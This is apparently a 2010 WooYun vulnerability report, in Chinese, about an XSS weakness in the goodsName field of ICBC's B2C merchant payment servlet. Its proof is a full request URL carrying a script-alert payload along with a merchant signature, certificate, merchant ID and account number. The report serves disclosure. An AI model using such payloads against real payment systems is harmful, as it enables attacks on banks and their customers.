漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2010-0888
漏洞标题:工商银行b2c商户支付存在XSS弱点
相关厂商:工商银行
漏洞作者: Liscker
提交时间:2010-11-30 10:48
修复时间:2010-11-30 11:04
公开时间:2010-11-30 11:04
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:5
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2010-11-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-11-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
工商银行b2c商户支付存在XSS弱点
详细说明:
goodsName存在XSS弱点
注意提交支付表单时间数据要在有效时间范围。
漏洞证明:
https://b2c.icbc.com.cn:443/servlet/ICBCINBSEBusinessServlet?merSignMsg=UwETHemn%2BZGtDXH1Shr1AhsuLznAGP6ze6%2F77rH4aKxtKezJ0PB1zEZrUXnD0wfrfQYPpOhJt7rQD6kb647jhNZgTYzXQTXcfAlhotA0w2ZSU5rS74%2B0iEqRiDmVxi49oyAh7OdEdkxCRbf8S6omNUyc89ZfRONrQubahnPZn3A%3D&merCert=MIICdDCCAd2gAwIBAgIKYULKEHrkACKn7jANBgkqhkiG9w0BAQUFADAnMQ8wDQYDVQQDEwZJY2JjQ0ExFDASBgNVBAoTC2ljYmMuY29tLmNuMB4XDTA5MTAxMDA2MjkzOFoXDTEwMTAxMDA2MjkzOFowPzEYMBYGA1UEAxMPeWVlcGF5MDEuZS40MDAwMQ0wCwYDVQQLEwQ0MDAwMRQwEgYDVQQKEwtpY2JjLmNvbS5jbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAvZa1tzLFf%2FRM9zSdy8nBoBNG0RI92Zdh0vplLlhPKiNwXFFtGuI0FGF9yD5CBZ6z2aH5piKQ15g%2F6vXmq4RoOsQAybA0e2FkE%2FHqYuDXZAlWgbKTKRFK9zW%2FR0OTxOQF2OSQIvaf1Q%2BYsoB%2BqqigzaHa5xdHhWPGLwvCooYskKsCAwEAAaOBjjCBizAfBgNVHSMEGDAWgBSnYiqG%2BrfWgZuFTNlkSGERswvHmjBJBgNVHR8EQjBAMD6gPKA6pDgwNjEQMA4GA1UEAxMHY3JsMjI3MjEMMAoGA1UECxMDY3JsMRQwEgYDVQQKEwtpY2JjLmNvbS5jbjAdBgNVHQ4EFgQUYDHjjT5kEx5CGbr34mwt7tubemowDQYJKoZIhvcNAQEFBQADgYEAhSHwxlCt3AYzO8O90bEHyPWtbucVOv%2FjTxKxFpaldRc20lkctKSOjSXpiy0%2FKTX4aJ7XC1QZO0pRTPjVxmlm%2BH64ZEFK23%2BgZQYX5EFKHJ8n6pMsVo%2Fg2YNRRm6lQtTqIU2dM1D9jV3Pxh5HmGtOwbXXKYTwE5GhPvaUI0x8xr8%3D&remark1=0&remark2=0&interfaceName=ICBC_PERBANK_B2C&interfaceVersion=1.0.0.0&orderid=352999184&amount=1232300&curType=001&merID=4000EC23359695&merAcct=4000021129200895575&verifyJoinFlag=0¬ifyType=HS&merURL=http%3A%2F%2Fbank.test.com&resultType=0&orderDate=20100921153305&goodsName=%3Cscript%3Ealert%28/1980/%29%3C/script%3E
修复方案:
过滤
版权声明:转载请注明来源 Liscker@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)